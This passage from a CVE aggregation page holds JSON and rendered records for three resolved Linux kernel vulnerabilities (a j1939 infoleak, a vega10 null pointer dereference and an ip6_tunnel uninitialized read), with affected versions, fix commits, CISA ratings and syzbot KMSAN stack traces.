            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.221",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.162",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.97",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.37",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.8",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.279",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.221",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.162",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.97",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.37",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.8",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.4",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: can: j1939: Initialize unused data in j1939_send_one()\n\nsyzbot reported kernel-infoleak in raw_recvmsg() [1]. j1939_send_one()\ncreates full frame including unused data, but it doesn\u0027t initialize\nit. This causes the kernel-infoleak issue. Fix this by initializing\nunused data.\n\n[1]\nBUG: KMSAN: kernel-infoleak in instrument_copy_to_user include/linux/instrumented.h:114 [inline]\nBUG: KMSAN: kernel-infoleak in copy_to_user_iter lib/iov_iter.c:24 [inline]\nBUG: KMSAN: kernel-infoleak in iterate_ubuf include/linux/iov_iter.h:29 [inline]\nBUG: KMSAN: kernel-infoleak in iterate_and_advance2 include/linux/iov_iter.h:245 [inline]\nBUG: KMSAN: kernel-infoleak in iterate_and_advance include/linux/iov_iter.h:271 [inline]\nBUG: KMSAN: kernel-infoleak in _copy_to_iter+0x366/0x2520 lib/iov_iter.c:185\n instrument_copy_to_user include/linux/instrumented.h:114 [inline]\n copy_to_user_iter lib/iov_iter.c:24 [inline]\n iterate_ubuf include/linux/iov_iter.h:29 [inline]\n iterate_and_advance2 include/linux/iov_iter.h:245 [inline]\n iterate_and_advance include/linux/iov_iter.h:271 [inline]\n _copy_to_iter+0x366/0x2520 lib/iov_iter.c:185\n copy_to_iter include/linux/uio.h:196 [inline]\n memcpy_to_msg include/linux/skbuff.h:4113 [inline]\n raw_recvmsg+0x2b8/0x9e0 net/can/raw.c:1008\n sock_recvmsg_nosec net/socket.c:1046 [inline]\n sock_recvmsg+0x2c4/0x340 net/socket.c:1068\n ____sys_recvmsg+0x18a/0x620 net/socket.c:2803\n ___sys_recvmsg+0x223/0x840 net/socket.c:2845\n do_recvmmsg+0x4fc/0xfd0 net/socket.c:2939\n __sys_recvmmsg net/socket.c:3018 [inline]\n __do_sys_recvmmsg net/socket.c:3041 [inline]\n __se_sys_recvmmsg net/socket.c:3034 [inline]\n __x64_sys_recvmmsg+0x397/0x490 net/socket.c:3034\n x64_sys_call+0xf6c/0x3b50 arch/x86/include/generated/asm/syscalls_64.h:300\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nUninit was created at:\n slab_post_alloc_hook mm/slub.c:3804 [inline]\n slab_alloc_node mm/slub.c:3845 [inline]\n kmem_cache_alloc_node+0x613/0xc50 mm/slub.c:3888\n kmalloc_reserve+0x13d/0x4a0 net/core/skbuff.c:577\n __alloc_skb+0x35b/0x7a0 net/core/skbuff.c:668\n alloc_skb include/linux/skbuff.h:1313 [inline]\n alloc_skb_with_frags+0xc8/0xbf0 net/core/skbuff.c:6504\n sock_alloc_send_pskb+0xa81/0xbf0 net/core/sock.c:2795\n sock_alloc_send_skb include/net/sock.h:1842 [inline]\n j1939_sk_alloc_skb net/can/j1939/socket.c:878 [inline]\n j1939_sk_send_loop net/can/j1939/socket.c:1142 [inline]\n j1939_sk_sendmsg+0xc0a/0x2730 net/can/j1939/socket.c:1277\n sock_sendmsg_nosec net/socket.c:730 [inline]\n __sock_sendmsg+0x30f/0x380 net/socket.c:745\n ____sys_sendmsg+0x877/0xb60 net/socket.c:2584\n ___sys_sendmsg+0x28d/0x3c0 net/socket.c:2638\n __sys_sendmsg net/socket.c:2667 [inline]\n __do_sys_sendmsg net/socket.c:2676 [inline]\n __se_sys_sendmsg net/socket.c:2674 [inline]\n __x64_sys_sendmsg+0x307/0x4a0 net/socket.c:2674\n x64_sys_call+0xc4b/0x3b50 arch/x86/include/generated/asm/syscalls_64.h:47\n do_syscall_x64 arch/x86/entry/common.c:52 [inline]\n do_syscall_64+0xcf/0x1e0 arch/x86/entry/common.c:83\n entry_SYSCALL_64_after_hwframe+0x77/0x7f\n\nBytes 12-15 of 16 are uninitialized\nMemory access of size 16 starts at ffff888120969690\nData copied to user address 00000000200017c0\n\nCPU: 1 PID: 5050 Comm: syz-executor198 Not tainted 6.9.0-rc5-syzkaller-00031-g71b1543c83d6 #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 03/27/2024"
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:22:27.050Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/5e4ed38eb17eaca42de57d500cc0f9668d2b6abf"
        },
        {
          "url": "https://git.kernel.org/stable/c/a2a0ebff7fdeb2f66e29335adf64b9e457300dd4"
        },
        {
          "url": "https://git.kernel.org/stable/c/4c5dc3927e17489c1cae6f48c0d5e4acb4cae01f"
        },
        {
          "url": "https://git.kernel.org/stable/c/f97cbce633923588307049c4aef9feb2987e371b"
        },
        {
          "url": "https://git.kernel.org/stable/c/ab2a683938ba4416d389c2f5651cbbb2c41b779f"
        },
        {
          "url": "https://git.kernel.org/stable/c/ba7e5ae8208ac07d8e1eace0951a34c169a2d298"
        },
        {
          "url": "https://git.kernel.org/stable/c/b7cdf1dd5d2a2d8200efd98d1893684db48fe134"
        }
      ],
      "title": "net: can: j1939: Initialize unused data in j1939_send_one()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-42076",
    "datePublished": "2024-07-29T15:52:38.981Z",
    "dateReserved": "2024-07-29T15:50:41.169Z",
    "dateUpdated": "2025-11-03T22:01:09.838Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-43905 (GCVE-0-2024-43905)

Vulnerability from cvelistv5 – Published: 2024-08-26 10:11 – Updated: 2026-01-05 10:52

Title

drm/amd/pm: Fix the null pointer dereference for vega10_hwmgr

Summary

In the Linux kernel, the following vulnerability has been resolved: drm/amd/pm: Fix the null pointer dereference for vega10_hwmgr Check return value and conduct null pointer handling to avoid null pointer dereference.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/2ac9deb7e087f0b46…
	https://git.kernel.org/stable/c/0fa11f9df96217c27…
	https://git.kernel.org/stable/c/c2629daf218a325f4…
	https://git.kernel.org/stable/c/2e538944996d0dd49…
	https://git.kernel.org/stable/c/69a441473fec2fc2a…
	https://git.kernel.org/stable/c/50151b7f1c79a0911…

Impacted products

Vendor

Product

Version

Linux

Affected: f83a9991648bb4023a53104db699e99305890d51 , < 2ac9deb7e087f0b461c3559d9eaa6b9cf19d3fa8 (git)
Affected: f83a9991648bb4023a53104db699e99305890d51 , < 0fa11f9df96217c2785b040629ff1a16900fb51c (git)
Affected: f83a9991648bb4023a53104db699e99305890d51 , < c2629daf218a325f4d69754452cd42fe8451c15b (git)
Affected: f83a9991648bb4023a53104db699e99305890d51 , < 2e538944996d0dd497faf8ee81f8bfcd3aca7d80 (git)
Affected: f83a9991648bb4023a53104db699e99305890d51 , < 69a441473fec2fc2aa2cf56122d6c42c4266a239 (git)
Affected: f83a9991648bb4023a53104db699e99305890d51 , < 50151b7f1c79a09117837eb95b76c2de76841dab (git)

Linux

Affected: 4.12
Unaffected: 0 , < 4.12 (semver)
Unaffected: 5.10.226 , ≤ 5.10.* (semver)
Unaffected: 5.15.167 , ≤ 5.15.* (semver)
Unaffected: 6.1.105 , ≤ 6.1.* (semver)
Unaffected: 6.6.46 , ≤ 6.6.* (semver)
Unaffected: 6.10.5 , ≤ 6.10.* (semver)
Unaffected: 6.11 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-43905",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:28:36.928558Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-12T17:32:56.871Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2025-11-03T22:07:07.531Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "url": "https://lists.debian.org/debian-lts-announce/2025/01/msg00001.html"
          },
          {
            "url": "https://lists.debian.org/debian-lts-announce/2024/10/msg00003.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "2ac9deb7e087f0b461c3559d9eaa6b9cf19d3fa8",
              "status": "affected",
              "version": "f83a9991648bb4023a53104db699e99305890d51",
              "versionType": "git"
            },
            {
              "lessThan": "0fa11f9df96217c2785b040629ff1a16900fb51c",
              "status": "affected",
              "version": "f83a9991648bb4023a53104db699e99305890d51",
              "versionType": "git"
            },
            {
              "lessThan": "c2629daf218a325f4d69754452cd42fe8451c15b",
              "status": "affected",
              "version": "f83a9991648bb4023a53104db699e99305890d51",
              "versionType": "git"
            },
            {
              "lessThan": "2e538944996d0dd497faf8ee81f8bfcd3aca7d80",
              "status": "affected",
              "version": "f83a9991648bb4023a53104db699e99305890d51",
              "versionType": "git"
            },
            {
              "lessThan": "69a441473fec2fc2aa2cf56122d6c42c4266a239",
              "status": "affected",
              "version": "f83a9991648bb4023a53104db699e99305890d51",
              "versionType": "git"
            },
            {
              "lessThan": "50151b7f1c79a09117837eb95b76c2de76841dab",
              "status": "affected",
              "version": "f83a9991648bb4023a53104db699e99305890d51",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/gpu/drm/amd/pm/powerplay/hwmgr/vega10_hwmgr.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.12"
            },
            {
              "lessThan": "4.12",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.226",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.167",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.105",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.46",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.10.*",
              "status": "unaffected",
              "version": "6.10.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.11",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.226",
                  "versionStartIncluding": "4.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.167",
                  "versionStartIncluding": "4.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.105",
                  "versionStartIncluding": "4.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.46",
                  "versionStartIncluding": "4.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10.5",
                  "versionStartIncluding": "4.12",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.11",
                  "versionStartIncluding": "4.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/pm: Fix the null pointer dereference for vega10_hwmgr\n\nCheck return value and conduct null pointer handling to avoid null pointer dereference."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:52:28.880Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/2ac9deb7e087f0b461c3559d9eaa6b9cf19d3fa8"
        },
        {
          "url": "https://git.kernel.org/stable/c/0fa11f9df96217c2785b040629ff1a16900fb51c"
        },
        {
          "url": "https://git.kernel.org/stable/c/c2629daf218a325f4d69754452cd42fe8451c15b"
        },
        {
          "url": "https://git.kernel.org/stable/c/2e538944996d0dd497faf8ee81f8bfcd3aca7d80"
        },
        {
          "url": "https://git.kernel.org/stable/c/69a441473fec2fc2aa2cf56122d6c42c4266a239"
        },
        {
          "url": "https://git.kernel.org/stable/c/50151b7f1c79a09117837eb95b76c2de76841dab"
        }
      ],
      "title": "drm/amd/pm: Fix the null pointer dereference for vega10_hwmgr",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-43905",
    "datePublished": "2024-08-26T10:11:06.619Z",
    "dateReserved": "2024-08-17T09:11:59.293Z",
    "dateUpdated": "2026-01-05T10:52:28.880Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-26641 (GCVE-0-2024-26641)

Vulnerability from cvelistv5 – Published: 2024-03-18 10:19 – Updated: 2025-05-04 08:52

Title

ip6_tunnel: make sure to pull inner header in __ip6_tnl_rcv()

Summary

In the Linux kernel, the following vulnerability has been resolved: ip6_tunnel: make sure to pull inner header in __ip6_tnl_rcv() syzbot found __ip6_tnl_rcv() could access unitiliazed data [1]. Call pskb_inet_may_pull() to fix this, and initialize ipv6h variable after this call as it can change skb->head. [1] BUG: KMSAN: uninit-value in __INET_ECN_decapsulate include/net/inet_ecn.h:253 [inline] BUG: KMSAN: uninit-value in INET_ECN_decapsulate include/net/inet_ecn.h:275 [inline] BUG: KMSAN: uninit-value in IP6_ECN_decapsulate+0x7df/0x1e50 include/net/inet_ecn.h:321 __INET_ECN_decapsulate include/net/inet_ecn.h:253 [inline] INET_ECN_decapsulate include/net/inet_ecn.h:275 [inline] IP6_ECN_decapsulate+0x7df/0x1e50 include/net/inet_ecn.h:321 ip6ip6_dscp_ecn_decapsulate+0x178/0x1b0 net/ipv6/ip6_tunnel.c:727 __ip6_tnl_rcv+0xd4e/0x1590 net/ipv6/ip6_tunnel.c:845 ip6_tnl_rcv+0xce/0x100 net/ipv6/ip6_tunnel.c:888 gre_rcv+0x143f/0x1870 ip6_protocol_deliver_rcu+0xda6/0x2a60 net/ipv6/ip6_input.c:438 ip6_input_finish net/ipv6/ip6_input.c:483 [inline] NF_HOOK include/linux/netfilter.h:314 [inline] ip6_input+0x15d/0x430 net/ipv6/ip6_input.c:492 ip6_mc_input+0xa7e/0xc80 net/ipv6/ip6_input.c:586 dst_input include/net/dst.h:461 [inline] ip6_rcv_finish+0x5db/0x870 net/ipv6/ip6_input.c:79 NF_HOOK include/linux/netfilter.h:314 [inline] ipv6_rcv+0xda/0x390 net/ipv6/ip6_input.c:310 __netif_receive_skb_one_core net/core/dev.c:5532 [inline] __netif_receive_skb+0x1a6/0x5a0 net/core/dev.c:5646 netif_receive_skb_internal net/core/dev.c:5732 [inline] netif_receive_skb+0x58/0x660 net/core/dev.c:5791 tun_rx_batched+0x3ee/0x980 drivers/net/tun.c:1555 tun_get_user+0x53af/0x66d0 drivers/net/tun.c:2002 tun_chr_write_iter+0x3af/0x5d0 drivers/net/tun.c:2048 call_write_iter include/linux/fs.h:2084 [inline] new_sync_write fs/read_write.c:497 [inline] vfs_write+0x786/0x1200 fs/read_write.c:590 ksys_write+0x20f/0x4c0 fs/read_write.c:643 __do_sys_write fs/read_write.c:655 [inline] __se_sys_write fs/read_write.c:652 [inline] __x64_sys_write+0x93/0xd0 fs/read_write.c:652 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0x6d/0x140 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x63/0x6b Uninit was created at: slab_post_alloc_hook+0x129/0xa70 mm/slab.h:768 slab_alloc_node mm/slub.c:3478 [inline] kmem_cache_alloc_node+0x5e9/0xb10 mm/slub.c:3523 kmalloc_reserve+0x13d/0x4a0 net/core/skbuff.c:560 __alloc_skb+0x318/0x740 net/core/skbuff.c:651 alloc_skb include/linux/skbuff.h:1286 [inline] alloc_skb_with_frags+0xc8/0xbd0 net/core/skbuff.c:6334 sock_alloc_send_pskb+0xa80/0xbf0 net/core/sock.c:2787 tun_alloc_skb drivers/net/tun.c:1531 [inline] tun_get_user+0x1e8a/0x66d0 drivers/net/tun.c:1846 tun_chr_write_iter+0x3af/0x5d0 drivers/net/tun.c:2048 call_write_iter include/linux/fs.h:2084 [inline] new_sync_write fs/read_write.c:497 [inline] vfs_write+0x786/0x1200 fs/read_write.c:590 ksys_write+0x20f/0x4c0 fs/read_write.c:643 __do_sys_write fs/read_write.c:655 [inline] __se_sys_write fs/read_write.c:652 [inline] __x64_sys_write+0x93/0xd0 fs/read_write.c:652 do_syscall_x64 arch/x86/entry/common.c:52 [inline] do_syscall_64+0x6d/0x140 arch/x86/entry/common.c:83 entry_SYSCALL_64_after_hwframe+0x63/0x6b CPU: 0 PID: 5034 Comm: syz-executor331 Not tainted 6.7.0-syzkaller-00562-g9f8413c4a66f #0 Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/17/2023

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/a9bc32879a08f23cd…
	https://git.kernel.org/stable/c/af6b5c50d47ab43e5…
	https://git.kernel.org/stable/c/d54e4da98bbfa8c25…
	https://git.kernel.org/stable/c/350a6640fac4b5356…
	https://git.kernel.org/stable/c/c835df3bcc14858ae…
	https://git.kernel.org/stable/c/8d975c15c0cd74400…

Impacted products

Vendor

Product

Version

Linux

Affected: 0d3c703a9d1723c7707e0680019ac8ff5922db42 , < a9bc32879a08f23cdb80a48c738017e39aea1080 (git)
Affected: 0d3c703a9d1723c7707e0680019ac8ff5922db42 , < af6b5c50d47ab43e5272ad61935d0ed2e264d3f0 (git)
Affected: 0d3c703a9d1723c7707e0680019ac8ff5922db42 , < d54e4da98bbfa8c257bdca94c49652d81d18a4d8 (git)
Affected: 0d3c703a9d1723c7707e0680019ac8ff5922db42 , < 350a6640fac4b53564ec20aa3f4a0922cb0ba5e6 (git)
Affected: 0d3c703a9d1723c7707e0680019ac8ff5922db42 , < c835df3bcc14858ae9b27315dd7de76370b94f3a (git)
Affected: 0d3c703a9d1723c7707e0680019ac8ff5922db42 , < 8d975c15c0cd744000ca386247432d57b21f9df0 (git)

Linux

Affected: 4.7
Unaffected: 0 , < 4.7 (semver)
Unaffected: 5.10.210 , ≤ 5.10.* (semver)
Unaffected: 5.15.149 , ≤ 5.15.* (semver)
Unaffected: 6.1.77 , ≤ 6.1.* (semver)
Unaffected: 6.6.16 , ≤ 6.6.* (semver)
Unaffected: 6.7.4 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26641",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-21T16:08:53.324454Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-21T16:09:02.235Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-11-08T15:02:48.742Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/a9bc32879a08f23cdb80a48c738017e39aea1080"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/af6b5c50d47ab43e5272ad61935d0ed2e264d3f0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d54e4da98bbfa8c257bdca94c49652d81d18a4d8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/350a6640fac4b53564ec20aa3f4a0922cb0ba5e6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c835df3bcc14858ae9b27315dd7de76370b94f3a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8d975c15c0cd744000ca386247432d57b21f9df0"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "url": "https://security.netapp.com/advisory/ntap-20241108-0008/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/ipv6/ip6_tunnel.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "a9bc32879a08f23cdb80a48c738017e39aea1080",
              "status": "affected",
              "version": "0d3c703a9d1723c7707e0680019ac8ff5922db42",
              "versionType": "git"
            },
            {
              "lessThan": "af6b5c50d47ab43e5272ad61935d0ed2e264d3f0",
              "status": "affected",
              "version": "0d3c703a9d1723c7707e0680019ac8ff5922db42",
              "versionType": "git"
            },
            {
              "lessThan": "d54e4da98bbfa8c257bdca94c49652d81d18a4d8",
              "status": "affected",
              "version": "0d3c703a9d1723c7707e0680019ac8ff5922db42",
              "versionType": "git"
            },
            {
              "lessThan": "350a6640fac4b53564ec20aa3f4a0922cb0ba5e6",
              "status": "affected",
              "version": "0d3c703a9d1723c7707e0680019ac8ff5922db42",
              "versionType": "git"
            },
            {
              "lessThan": "c835df3bcc14858ae9b27315dd7de76370b94f3a",
              "status": "affected",
              "version": "0d3c703a9d1723c7707e0680019ac8ff5922db42",
              "versionType": "git"
            },
            {
              "lessThan": "8d975c15c0cd744000ca386247432d57b21f9df0",
              "status": "affected",
              "version": "0d3c703a9d1723c7707e0680019ac8ff5922db42",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/ipv6/ip6_tunnel.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "4.7"
            },
            {
              "lessThan": "4.7",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.210",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.149",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.77",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.16",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.7.*",
              "status": "unaffected",
              "version": "6.7.4",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.8",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.210",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.149",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.77",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.16",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.7.4",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8",
                  "versionStartIncluding": "4.7",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nip6_tunnel: make sure to pull inner header in __ip6_tnl_rcv()\n\nsyzbot found __ip6_tnl_rcv() could access unitiliazed data [1].\n\nCall pskb_inet_may_pull() to fix this, and initialize ipv6h\nvariable after this call as it can change skb-\u003ehead.\n\n[1]\n BUG: KMSAN: uninit-value in __INET_ECN_decapsulate include/net/inet_ecn.h:253 [inline]\n BUG: KMSAN: uninit-value in INET_ECN_decapsulate include/net/inet_ecn.h:275 [inline]\n BUG: KMSAN: uninit-value in IP6_ECN_decapsulate+0x7df/0x1e50 include/net/inet_ecn.h:321\n  __INET_ECN_decapsulate include/net/inet_ecn.h:253 [inline]\n  INET_ECN_decapsulate include/net/inet_ecn.h:275 [inline]\n  IP6_ECN_decapsulate+0x7df/0x1e50 include/net/inet_ecn.h:321\n  ip6ip6_dscp_ecn_decapsulate+0x178/0x1b0 net/ipv6/ip6_tunnel.c:727\n  __ip6_tnl_rcv+0xd4e/0x1590 net/ipv6/ip6_tunnel.c:845\n  ip6_tnl_rcv+0xce/0x100 net/ipv6/ip6_tunnel.c:888\n gre_rcv+0x143f/0x1870\n  ip6_protocol_deliver_rcu+0xda6/0x2a60 net/ipv6/ip6_input.c:438\n  ip6_input_finish net/ipv6/ip6_input.c:483 [inline]\n  NF_HOOK include/linux/netfilter.h:314 [inline]\n  ip6_input+0x15d/0x430 